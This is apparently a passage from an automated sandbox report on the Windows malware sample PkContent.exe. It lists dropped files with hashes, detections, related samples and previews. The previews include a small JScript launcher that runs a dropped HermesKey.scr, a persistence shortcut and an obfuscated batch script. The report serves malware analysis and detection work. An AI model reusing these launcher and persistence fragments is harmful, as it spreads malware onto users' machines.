            stail.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
            • 199.232.214.172
            22TxDBB1.batGet hashmaliciousUnknownBrowse
            • 199.232.214.172
            sxVHUOSqVC.exeGet hashmaliciousUnknownBrowse
            • 199.232.210.172
            pyld611114.exeGet hashmaliciousUnknownBrowse
            • 199.232.210.172
            Lu4421.exeGet hashmaliciousAsyncRAT, DcRat, StealeriumBrowse
            • 199.232.214.172
            do.ps1Get hashmaliciousUnknownBrowse
            • 199.232.214.172
            No context
            No context
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrldqj18tn.exeGet hashmaliciousUnknownBrowse
              ldqj18tn.exeGet hashmaliciousUnknownBrowse
                EO3RT0fEfb.exeGet hashmaliciousUnknownBrowse
                  RMBOriPHVJ.exeGet hashmaliciousUnknownBrowse
                    S6x3K8vzCA.exeGet hashmaliciousUnknownBrowse
                      PPbimZI4LV.exeGet hashmaliciousUnknownBrowse
                        l5VhEpwzJy.exeGet hashmaliciousUnknownBrowse
                          duyba.lnk.download.lnkGet hashmaliciousUnknownBrowse
                            pt8GJiNZDT.exeGet hashmaliciousUnknownBrowse
                              c2.htaGet hashmaliciousXWormBrowse
                                C:\Users\user\AppData\Local\Temp\724598\Thermal.pifldqj18tn.exeGet hashmaliciousUnknownBrowse
                                  ldqj18tn.exeGet hashmaliciousUnknownBrowse
                                    EO3RT0fEfb.exeGet hashmaliciousUnknownBrowse
                                      RMBOriPHVJ.exeGet hashmaliciousUnknownBrowse
                                        S6x3K8vzCA.exeGet hashmaliciousUnknownBrowse
                                          PPbimZI4LV.exeGet hashmaliciousUnknownBrowse
                                            l5VhEpwzJy.exeGet hashmaliciousUnknownBrowse
                                              duyba.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                pt8GJiNZDT.exeGet hashmaliciousUnknownBrowse
                                                  c2.htaGet hashmaliciousXWormBrowse
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:ASCII text, with very long lines (811), with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):17659
                                                    Entropy (8bit):4.996564903453331
                                                    Encrypted:false
                                                    SSDEEP:384:qG9f41OBFJrXYnH/lQutCtyuZT2Unp1vS8++ZBBgY6V7NS:qpAvCnH9QuNuZDp1RvE7NS
                                                    MD5:F15A876FE95AF76D09E4F26593B4502E
                                                    SHA1:53D14A9F7B44DE6FD9ABA018E0F4738175A4E3A0
                                                    SHA-256:4DDF695422DB24B6917750A923DB6D55E9973A4463CF3B60F0C732D34F7728D1
                                                    SHA-512:CBC944366518FEA910CC685C6AC99CAAFA20FFD91BA8572B5E33FEEB9529CEA6684E83365C5851D6798BCD3DC265E9157AE80E60F56F061C2B78E6C935E48741
                                                    Malicious:false
                                                    Preview:Set Transform=1..cWCQInternationally Fi Vista ..ETsBowling Deborah Present Tried Voyeur Disability Affecting Divine Notebook ..gxROrders Sector Might Alter ..wYSeekers Shirts Studio Flavor ..qbmPmid Signal Somewhat Series Textbooks Placed Trustees Spank Establish ..KPDylan Home Key Bidding Quantitative Cleaning ..Set Basement=N..OzHandbags Nbc Gardens ..RkThreshold Quest Pct Orders Sn Few Mom Stores ..atjAcquisitions Finance Wishlist ..PsnCustom Brass Moisture Emails Faced ..XODhNovember Charged Effect Barry Attention Marshall Ascii ..Set Celebrities= ..cBgSquad Grill Aquarium ..xidWAtm Give Percentage Company June Dh ..PJRCompleting Advanced None Card V Ea Taxes ..OLhrEntering ..MDhAlcohol Villa Computer Pharmacology ..nAuIndustrial Clusters ..LKEeSeasons Traditions Valium Boom Dig Implemented Cherry Successful ..dHTYSummary Majority Displayed Shall Rand ..Set Programming=Y..XfTrim Microphone Ace Feedback ..omlESuccessfully Spies ..lSStarsmerchant Syndication Masturbating Approx Thou
                                                    Process:C:\Users\user\AppData\Local\Temp\724598\Thermal.pif
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):182
                                                    Entropy (8bit):4.820012868353575
                                                    Encrypted:false
                                                    SSDEEP:3:RiMIpGXIdPHo55wWAX+d4a+kEkD5iQERuAcCwPcTFZo5uWAX+d4a+kEkD5iQERuN:RiJBJHonwWD+vkDB+uAcBwFywWD+vkDZ
                                                    MD5:C9B024719DF3364B20A25C209963DEEC
                                                    SHA1:C0BAD4ED77A6338797E5A33924E760209AC44FD7
                                                    SHA-256:EE01E3101C35F73432D3C4443B7C2EEF0F28AFD1B7B442007C33E270283964A5
                                                    SHA-512:9BC72C9A09BF543BE6DEC19E2B89B40C4D1CB29250725F6BA8D0CBA7DD6B4D896EEED134E5A61E2B506A8A24375C17AA43887D615D9481F0F9AF33AFFAAC7E21
                                                    Malicious:true
                                                    Preview:new ActiveXObject("Wscript.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\GuardKey Solutions\\HermesKey.scr\" \"C:\\Users\\user\\AppData\\Local\\GuardKey Solutions\\g\"")
                                                    Process:C:\Users\user\AppData\Local\Temp\724598\Thermal.pif
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):893608
                                                    Entropy (8bit):6.62028134425878
                                                    Encrypted:false
                                                    SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                    MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                    SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                    SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                    SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                    Joe Sandbox View:
                                                    • Filename: ldqj18tn.exe, Detection: malicious, Browse
                                                    • Filename: ldqj18tn.exe, Detection: malicious, Browse
                                                    • Filename: EO3RT0fEfb.exe, Detection: malicious, Browse
                                                    • Filename: RMBOriPHVJ.exe, Detection: malicious, Browse
                                                    • Filename: S6x3K8vzCA.exe, Detection: malicious, Browse
                                                    • Filename: PPbimZI4LV.exe, Detection: malicious, Browse
                                                    • Filename: l5VhEpwzJy.exe, Detection: malicious, Browse
                                                    • Filename: duyba.lnk.download.lnk, Detection: malicious, Browse
                                                    • Filename: pt8GJiNZDT.exe, Detection: malicious, Browse
                                                    • Filename: c2.hta, Detection: malicious, Browse
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                    Process:C:\Users\user\AppData\Local\Temp\724598\Thermal.pif
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):260336
                                                    Entropy (8bit):7.999311838752394
                                                    Encrypted:true
                                                    SSDEEP:6144:SN9qVraESmDT3z3sYoAjxVs3iH96NSO8e91qkeIPC9mq5XF/:iQrskLrHoAjxVs3iH94j9QxAC9J5B
                                                    MD5:A65498AB3A69A64EAD790DB5BB2F48AA
                                                    SHA1:EB8CD723DAB355FF507B356B9286F09B9FFCD968
                                                    SHA-256:9AD27753646F1EEC5009BE7ED43BCDFC4E9AB8DFFC6FE3FF4ADC558A1F32F5CD
                                                    SHA-512:9CFCB7873C3BAD12109A85516EAF62393AA905B5A7FA93E8BC808EF0911070EA89F0E41953E67B45B74409BF0AC046FD7F4A12AB612EDF7BF01A46C459BA1CEF
                                                    Malicious:false
                                                    Preview:]6. I..B.PtP....R.N~..]w}=#..h.b.>JN).....SOxVqn..^......T...m.Nb..P..Kpy...&.........Vd.<2G.....H3.?e...-.iEh.L..#..T4Y.<.s....:.EMr....7.U..G.e.....[.(.Q...~....=7`....Y[E.,V..m.....r..+.....1..(u<.....2.+$Sf.y.S...X.".8N?.Y...[.1.$.!....2..R.........E..r....G./....54.....2./.....V..-....$'.X.i..+{Rd..."{.Ci..:...../&....G.Xjyl_WW.v;...=.h.......K,......o..O .E?b|D...[.a6D...]....+._H./......u...S.tX...OX.{.|K....4y..%j7G.P....`.Z.....<%v..:.Z.+[...3f.n.d8g..~^.$..Y.d.E....t4..nq..m...:......$>N../.t(.4q%./|..<.>~....)..q.,ol%<!...@..K..w.*Jw.[..S.H....<KE.Wq.Z..}.G.YH..B3.&q..lU.Rg.4....= .u..pu.....7.G.........r.H.J<Y...4...@.D../....l%.}5X..._..m.|G.z..`..b6..=B4\.C.3prRs#m...uGoPN.`r.E.H....h..*h.).k.....T.@A..g..[.......VS...rf..i.B.1kF.b.G/....`V~.,B.$....p...*...I.~..`.'C..H.....'f..VW;..8k.?....... .W.;.(......}..L'....5#.._Z.h.5.E.:..LX..w.`E>^`f.Y.4.N4.~..J......{..<1.&.0.w ."...:..L.)....;j.R..i....d%....o.nH....udo....S.O.
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Category:modified
                                                    Size (bytes):893608
                                                    Entropy (8bit):6.62028134425878
                                                    Encrypted:false
                                                    SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                    MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                    SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                    SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                    SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                    Joe Sandbox View:
                                                    • Filename: ldqj18tn.exe, Detection: malicious, Browse
                                                    • Filename: ldqj18tn.exe, Detection: malicious, Browse
                                                    • Filename: EO3RT0fEfb.exe, Detection: malicious, Browse
                                                    • Filename: RMBOriPHVJ.exe, Detection: malicious, Browse
                                                    • Filename: S6x3K8vzCA.exe, Detection: malicious, Browse
                                                    • Filename: PPbimZI4LV.exe, Detection: malicious, Browse
                                                    • Filename: l5VhEpwzJy.exe, Detection: malicious, Browse
                                                    • Filename: duyba.lnk.download.lnk, Detection: malicious, Browse
                                                    • Filename: pt8GJiNZDT.exe, Detection: malicious, Browse
                                                    • Filename: c2.hta, Detection: malicious, Browse
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):260336
                                                    Entropy (8bit):7.999311838752394
                                                    Encrypted:true
                                                    SSDEEP:6144:SN9qVraESmDT3z3sYoAjxVs3iH96NSO8e91qkeIPC9mq5XF/:iQrskLrHoAjxVs3iH94j9QxAC9J5B
                                                    MD5:A65498AB3A69A64EAD790DB5BB2F48AA
                                                    SHA1:EB8CD723DAB355FF507B356B9286F09B9FFCD968
                                                    SHA-256:9AD27753646F1EEC5009BE7ED43BCDFC4E9AB8DFFC6FE3FF4ADC558A1F32F5CD
                                                    SHA-512:9CFCB7873C3BAD12109A85516EAF62393AA905B5A7FA93E8BC808EF0911070EA89F0E41953E67B45B74409BF0AC046FD7F4A12AB612EDF7BF01A46C459BA1CEF
                                                    Malicious:false
                                                    Preview:]6. I..B.PtP....R.N~..]w}=#..h.b.>JN).....SOxVqn..^......T...m.Nb..P..Kpy...&.........Vd.<2G.....H3.?e...-.iEh.L..#..T4Y.<.s....:.EMr....7.U..G.e.....[.(.Q...~....=7`....Y[E.,V..m.....r..+.....1..(u<.....2.+$Sf.y.S...X.".8N?.Y...[.1.$.!....2..R.........E..r....G./....54.....2./.....V..-....$'.X.i..+{Rd..."{.Ci..:...../&....G.Xjyl_WW.v;...=.h.......K,......o..O .E?b|D...[.a6D...]....+._H./......u...S.tX...OX.{.|K....4y..%j7G.P....`.Z.....<%v..:.Z.+[...3f.n.d8g..~^.$..Y.d.E....t4..nq..m...:......$>N../.t(.4q%./|..<.>~....)..q.,ol%<!...@..K..w.*Jw.[..S.H....<KE.Wq.Z..}.G.YH..B3.&q..lU.Rg.4....= .u..pu.....7.G.........r.H.J<Y...4...@.D../....l%.}5X..._..m.|G.z..`..b6..=B4\.C.3prRs#m...uGoPN.`r.E.H....h..*h.).k.....T.@A..g..[.......VS...rf..i.B.1kF.b.G/....`V~.,B.$....p...*...I.~..`.'C..H.....'f..VW;..8k.?....... .W.;.(......}..L'....5#.._Z.h.5.E.:..LX..w.`E>^`f.Y.4.N4.~..J......{..<1.&.0.w ."...:..L.)....;j.R..i....d%....o.nH....udo....S.O.
                                                    Process:C:\Users\user\Desktop\PkContent.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):92160
                                                    Entropy (8bit):7.997684559122398
                                                    Encrypted:true
                                                    SSDEEP:1536:IwEPVIU3le9KUpCuF/Rw7B1Ph87++NdnOpL1+2TZMzDfbCjkqmqISfnKu4+Q1P:IwE9/e91xO7fh8akkL1WPCjRmq5vv4+Q
                                                    MD5:975BFC19287C2C5B74A1B228F30F14B0
                                                    SHA1:8F5FEEC00B337529A7E193F452C45F6063AD37A1
                                                    SHA-256:91E28EFACE5E10865887B9A13420B1BFD3A8673255785E3BFC65745DA63D1322
                                                    SHA-512:18D8C41EBCBA5667CB3AC3FA1270D78CAD2FD9E8FC69DD32969B693FEDC6354E3DE12F74830E68B55C6AA7C5A0FBB388599F827CB94D71732231F4EBBF580F85
                                                    Malicious:false
                                                    Preview:D.7y;..|F..:#>_t.^. S....m....9.]OD...!.....U..wG...}..nk:.?..5..>...=....o.....7....J.....y.S&.....!.m... ..*...<Y.L|..5........7R......?...s..x..........e{'..lF....h.&...r..m.Sq.........Hp&/...........;uz...p..MH....#*..{1.g....".J0...KO....(.......G.yh......|.......O...H.w.~./E.H..w.EL.........Z>....N.z.......4.D=.7.]LCvU.dr...._.f...f...7JR.0.s.. ..k.:R.9....|...vQ2..:....).).z..&......?..w.W.:..)~..<=6.Z+v.[............!.....e0.<..Z..+\.g..D.,......../.].L1`.E..7...-.2..K.m..% VE...9^.c....t....t..-z-.8ZGxpc>.n.z.^,.....Pd..9M..g(..6..........S..`|..w.....J..5....ODJ.PM.jw....F..y.(^...Q.c..............v.....Y.C)....wBj5<..H...~*[:...p........B[.|h..+}.N.I@..>V....<.NB..K.A.....y..(^.%..,.$.....{.c.......T..s....I..^Co+?...."...@.,..T.W.L*@G.6ZT....Kg."...ba...`...qTQ...n......L.%di. .;[B.*hfrdB.....{.Z...w..g.1R-.D8J....0.>.v.1-.ha...6]..'.....Ep.M...q.t..up.....3q/B.7.Yh_....+&..Q.K..w..&)&..9|.h........vq.FC.`.1.p(t.K...D..!...5.
                                                    Process:C:\Users\user\Desktop\PkContent.exe
                                                    File Type:data
                                                    Category:modified
                                                    Size (bytes):59392
                                                    Entropy (8bit):7.99698463424558
                                                    Encrypted:true
                                                    SSDEEP:1536:c4/at9N5gQq5rFSWa39Mp9cBESBESKI2Eux:c4K9NOQq5rpa3ipmBESmSL2Eux
                                                    MD5:01D7374BF51507454392D1081D9B309E
                                                    SHA1:034378159B5F4B6089A95064AEC9FF210DA7C3DF
                                                    SHA-256:EECDD8DFD2DD6D9D1C55077EE6515A9C59D3046112D014B7A5E87FDABB8157A2
                                                    SHA-512:DE64B35BFD2C279A77D552F7C518421BFFCF2F5D14E78FA3F80E21B97AEB5DC287340452D61CA19C9AA5CE426C61EC6605786727D844282AA5457A1D8C4F94F4
                                                    Malicious:false
                                                    Preview:]6. I..B.PtP....R.N~..]w}=#..h.b.>JN).....SOxVqn..^......T...m.Nb..P..Kpy...&.........Vd.<2G.....H3.?e...-.iEh.L..#..T4Y.<.s....:.EMr....7.U..G.e.....[.(.Q...~....=7`....Y[E.,V..m.....r..+.....1..(u<.....2.+$Sf.y.S...X.".8N?.Y...[.1.$.!....2..R.........E..r....G./....54.....2./.....V..-....$'.X.i..+{Rd..."{.Ci..:...../&....G.Xjyl_WW.v;...=.h.......K,......o..O .E?b|D...[.a6D...]....+._H./......u...S.tX...OX.{.|K....4y..%j7G.P....`.Z.....<%v..:.Z.+[...3f.n.d8g..~^.$..Y.d.E....t4..nq..m...:......$>N../.t(.4q%./|..<.>~....)..q.,ol%<!...@..K..w.*Jw.[..S.H....<KE.Wq.Z..}.G.YH..B3.&q..lU.Rg.4....= .u..pu.....7.G.........r.H.J<Y...4...@.D../....l%.}5X..._..m.|G.z..`..b6..=B4\.C.3prRs#m...uGoPN.`r.E.H....h..*h.).k.....T.@A..g..[.......VS...rf..i.B.1kF.b.G/....`V~.,B.$....p...*...I.~..`.'C..H.....'f..VW;..8k.?....... .W.;.(......}..L'....5#.._Z.h.5.E.:..LX..w.`E>^`f.Y.4.N4.~..J......{..<1.&.0.w ."...:..L.)....;j.R..i....d%....o.nH....udo....S.O.
                                                    Process:C:\Users\user\Desktop\PkContent.exe
                                                    File Type:ASCII text, with very long lines (811), with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):17659
                                                    Entropy (8bit):4.996564903453331
                                                    Encrypted:false
                                                    SSDEEP:384:qG9f41OBFJrXYnH/lQutCtyuZT2Unp1vS8++ZBBgY6V7NS:qpAvCnH9QuNuZDp1RvE7NS
                                                    MD5:F15A876FE95AF76D09E4F26593B4502E
                                                    SHA1:53D14A9F7B44DE6FD9ABA018E0F4738175A4E3A0
                                                    SHA-256:4DDF695422DB24B6917750A923DB6D55E9973A4463CF3B60F0C732D34F7728D1
                                                    SHA-512:CBC944366518FEA910CC685C6AC99CAAFA20FFD91BA8572B5E33FEEB9529CEA6684E83365C5851D6798BCD3DC265E9157AE80E60F56F061C2B78E6C935E48741
                                                    Malicious:false
                                                    Preview:Set Transform=1..cWCQInternationally Fi Vista ..ETsBowling Deborah Present Tried Voyeur Disability Affecting Divine Notebook ..gxROrders Sector Might Alter ..wYSeekers Shirts Studio Flavor ..qbmPmid Signal Somewhat Series Textbooks Placed Trustees Spank Establish ..KPDylan Home Key Bidding Quantitative Cleaning ..Set Basement=N..OzHandbags Nbc Gardens ..RkThreshold Quest Pct Orders Sn Few Mom Stores ..atjAcquisitions Finance Wishlist ..PsnCustom Brass Moisture Emails Faced ..XODhNovember Charged Effect Barry Attention Marshall Ascii ..Set Celebrities= ..cBgSquad Grill Aquarium ..xidWAtm Give Percentage Company June Dh ..PJRCompleting Advanced None Card V Ea Taxes ..OLhrEntering ..MDhAlcohol Villa Computer Pharmacology ..nAuIndustrial Clusters ..LKEeSeasons Traditions Valium Boom Dig Implemented Cherry Successful ..dHTYSummary Majority Displayed Shall Rand ..Set Programming=Y..XfTrim Microphone Ace Feedback ..omlESuccessfully Spies ..lSStarsmerchant Syndication Masturbating Approx Thou
                                                    Process:C:\Users\user\Desktop\PkContent.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):886191
                                                    Entropy (8bit):6.62214375347849
                                                    Encrypted:false
                                                    SSDEEP:12288:SV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:wxz1JMyyzlohMf1tN70aw8501
                                                    MD5:260377B64080B872FFD57234FF7D097E
                                                    SHA1:F9EA953F328A1EC1CAC31AC05A6353AE27519238
                                                    SHA-256:29826DE3343C0A6F753F3CDCC551E755E12059E79B0658BE1048E5F893E1C0D3
                                                    SHA-512:A01A781D352AC7CB98FD17F91DB6114147188519819106D27A183F8BC114713DE8D0E78524DCAB8833187E365F2207DA5E4CD77FC8D787F63B48A04BF17B6DE5
                                                    Malicious:false
                                                    Preview:L.un.=4xL...........h.........Y..................E..}.P. xL......54xL.F.54xL...$xL.....0xL.....9.M..I..O._^..]...j.^3.;.~...$xL....98u#h.....[...Y..t..............3..F;.|...U..V.u.W....t$j.V..\.I.;Gxs..Ot.......t.91u._^]........U..V.u.W....t$j.V..\.I.;Gds..O`.......t.91u._^]........U..QS3....wL.....V3....wL.@...wL.W.....wL...wL...wL....wL...wL....wL....wL..=.wL....wL....wL....wL....wL.....j.^j|Xf..wL.3....xL.h.I....xL....xL....xL..=.xL... xL.l.I...$xL...(xL...,xL..50xL...4xL.......8xL...<xL...@xL..=DxL..=HxL...|xL....xL....xL..=.xL.f..wL..2.......~....]..E.. xL.P....Nu._^..wL.[..].V......|xL.....c....%.xL....8xL.....b....%@xL... xL........xL........wL........wL.....D...^.U...(SVWh.....*...Y....A......^........xL..}..M.9..wL........E...P..xL.......}....xL..].....8..xL.......p....u.........................................E @....#E .E..@......E..E .E..E..}..............}...........u-j..E.Pj.j0..@.I.j...X.I..M.+M..M.+...+....E..} .uFj..E.Pj.j0..@.I.j...X.I..M.+M..M.+...+....E
                                                    Process:C:\Users\user\Desktop\PkContent.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):10480
                                                    Entropy (8bit):7.983798029647035
                                                    Encrypted:false
                                                    SSDEEP:192:jynff145sxYlJ7FDcxxHHivPT+sefSn+zStbLkJdljKQQkVww:j+Hk7Fiel+zqyl+xkh
                                                    MD5:B5A2CE2534752D3A6033F59C8436D7B6
                                                    SHA1:8E184055AF6E0F7DCD83D832BD565E784A7B8E80
                                                    SHA-256:C142EBC3005012C982B366C6E4B03DB5B477C721EED245592A6F2C585EC314C3
                                                    SHA-512:C2F5480E23FCD32AC7111FC9E507B7660EE551477A1DC18F188BD5796BF29BC93CC10926908F9F6483E906BFC07DDE07BE7223BC0B4B4C5DBC0FA1C0F2D43F2C
                                                    Malicious:false
                                                    Preview:.Lc}.....B.....G?.H...,.~o...3..9.C.Y_.....Z.7...X....i.....42...r/e...L..........M.{......?B.ZwF.U...2).:.~)=?...p.`B~.i...@.l.V......3.15..e.x%_.G.-.........."...0.Q...........I.f.......\%(.o..z?...W......(Zl..y.../.}P.s...K.....O.vT:.(Lk.W.....N...........h....V...cz@@.....^._...C.[.Tz...<...+C+.....H..-...A..n....=CM6T..]..5w+L.......c..v}..Ys..t.7F..l_.0..{D..W....`....2f)|...$N..n.D....`s...7...O-$.rc?...T+..C..=....L..\.`......oN....(..K..S=.m.....e.6..l..2..H.........6d....$r...z [Z..z...I.[SP[dg....LVN.8.sd.>....]...[,.MS.(..~.#..u6..M...e?...i.H.{.o....Tq..T?...?>.....<.84.;....B1..Q.9.....BcT.@Lr.7{.....=&..j..V.B..<JVu.s.l:.....wzXM..H>n......... 8.d6..;...^.6..E[.|.NG.AT.6...Z....s..t]w.i....q.Q...$".~q;+..*....p|Xx3...(.....F.EB.....6.Tv.,..3,.L*|..1_.V.Y....a.k.b..1.z.?fQw...kM.v......Z.x.1.7(.Ot...........B....'.cm....I....".. ~.....AS_.....5-.nwSu.z.0zY.?.~[.......{....o).*3..l.D..f...A{[.QB........ .+......-....@...W.c...
                                                    Process:C:\Users\user\Desktop\PkContent.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):7439
                                                    Entropy (8bit):6.20867102662523
                                                    Encrypted:false
                                                    SSDEEP:192:3HAeOqAFDw09CV/2nPvj6DdMP3r1HI5jMlbN+G3j:3HAHhww+/2nlP3r1WAL3j
                                                    MD5:4192BA712A2FDC09914B07D144F06E20
                                                    SHA1:0A3320EEA12B490FD589B9F2CB878579108BE555
                                                    SHA-256:265661FDDDD79AEFCFBA0FC456CF864C05439B8281DA8345D200283F5664A229
                                                    SHA-512:543248B976F061C835329ADBCCBB249922EBEB671BB158D7A0E70284E0FE9D723C18E8A2E4F198202CFA20DC3D0F341EFD4E78C64F4D5E56E8D2A08745417948
                                                    Malicious:false
                                                    Preview:WowLiberalCalOfficer..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B..........................................................................................................................................................................................................................................................
                                                    Process:C:\Users\user\Desktop\PkContent.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):98304
                                                    Entropy (8bit):7.997882479856261
                                                    Encrypted:true
                                                    SSDEEP:1536:jCFS3z3sTLVmA/uMsH3zK6wrNp9FCLFM1pKOnaJt7ggzNVsFBLiHy4QWQ3NSmFPN:p3z3sTLEA/Kj9S/9p1ajcQVs3iH9Q3Nn
                                                    MD5:B7C64D91870C30F6D27B86C9294CA361
                                                    SHA1:41EA994169F7BEA9752F6BD40D9833D6577EDE49
                                                    SHA-256:91A57858547382FA34E5AAD2A6C8546C4EAEAA32B515693E42E84AD190149A6A
                                                    SHA-512:D6D3625A28A8AB2AAD5E5E80CB10798D3602E0E189D521E4FECBEE4F4015F07E7D2C6F9CDBEC4C9EFCC5C903C3EBAAF9B6ABBF30D615748316992A5C398BC1B6
                                                    Malicious:false
                                                    Preview:..O...`...*..L3".....V....0.........B._.........(....98T9......i....Z...\v.........7.nJ.`..m.).O@0."..U...HH..6Mj........#'..?..t....u...QF&+....'....^.!hK..k.h......._H.#E-..&IF3..0`...3>..+i.[.........#...W..lj.c..P..GD.....o....m..Ozt..i.U..P.[.j......q..HR.:.,...c..|....%..#..=..wd..3..;.......5....>T.....%.mk$.w..+7..u.::.9....q..P..qA..Q(.]......d.5K..k..0.*......zy....C...rO.3...W..Hg.@Tc...f..b.T...8\.EA.C..<V.[.Z./.\..8..i...._..X..6.......q.\.1{7'...~v.R.'.....=^.Tc}c.q.........`.8...%...\.D|.o....Fibpo......L..>.{....E.e....B....V...~cj..t...<@..+..[vP.V...*.h.NzJI..1.L..O.\."....-hP.......M.......E...W...p... ....;%'w@....K..B. v..m...x.1.....\5...Y/.O.l.....*,.C.<.G..U]....%...ba.^..N:....s...dH|..Y-..k/P......jh..}...Z.kA.IM *<O..j-..i....T.X...*..K.bS.&....."..$D.}.&q|.NIo.:.z.y.w...J.....b....3..."M..@.....#.......6.Tc.q..`..r....`..k3.6o.k...o.....z.d...r.o..=Q...f$..~...|w.Y;...s.....1.N.CA.......5Tgt....x3
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js" >), ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):96
                                                    Entropy (8bit):4.937514814070938
                                                    Encrypted:false
                                                    SSDEEP:3:HRAbABGQaFyw3pYo0nacwRE2J5iQRAcCIPcp:HRYF5yjocNwi23iQRAcPS
                                                    MD5:4E6F60332F394B1CB236BA923FC87B04
                                                    SHA1:A2D06F700B6FE01B536998CE999CBEDCF814F83C
                                                    SHA-256:5CA91FB60E41BB4919437F02D024FBD1BCE308D99354D75163C9AD292023345F
                                                    SHA-512:F2E66BA6F833D7D6C5180928EC9B5B87AC7247AA90E0614F310B6DA4F48690D6AA3147826DD9283198DAA6AE08DFC5C6BDD0B467C6B50130142F7E410F9D6C76
                                                    Malicious:true
                                                    Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js" ..
                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Entropy (8bit):7.3246704923656605
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:PkContent.exe
                                                    File size:830'415 bytes
                                                    MD5:87c051a77edc0cc77a4d791ef72367d1
                                                    SHA1:5d5bab642235f0af7d9afe3cacec5ae2a4cfc8e5
                                                    SHA256:b63bf28780e02bf0bb1bb59dec135e6263f4c582724c95eee0519b279022f31c
                                                    SHA512:259a3f823d5051fcc9e87ceacf25557ab17f5d26ff4f0c17801d9ef83a23d2a51261a73e5ba9c3caf1ca2feb18a569458f17a2a5d56b542b86d6a124a42d4c2c
                                                    SSDEEP:12288:FCxMe2dk7YgL+OsQdFGHjaRYf9bquEZ68ufU3wqB2ydPsW/w0bvf:FsMe2KYIDpSO5vZ68FwqB2aPsW3
                                                    TLSH:A80523030FEDC667D1E10EB2183381698AB2F89F05B1E66B43A08F1F3175E459A5A35F
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8.....
                                                    Icon Hash:0103010303030303
                                                    Entrypoint:0x403883
                                                    Entrypoint Section:.text
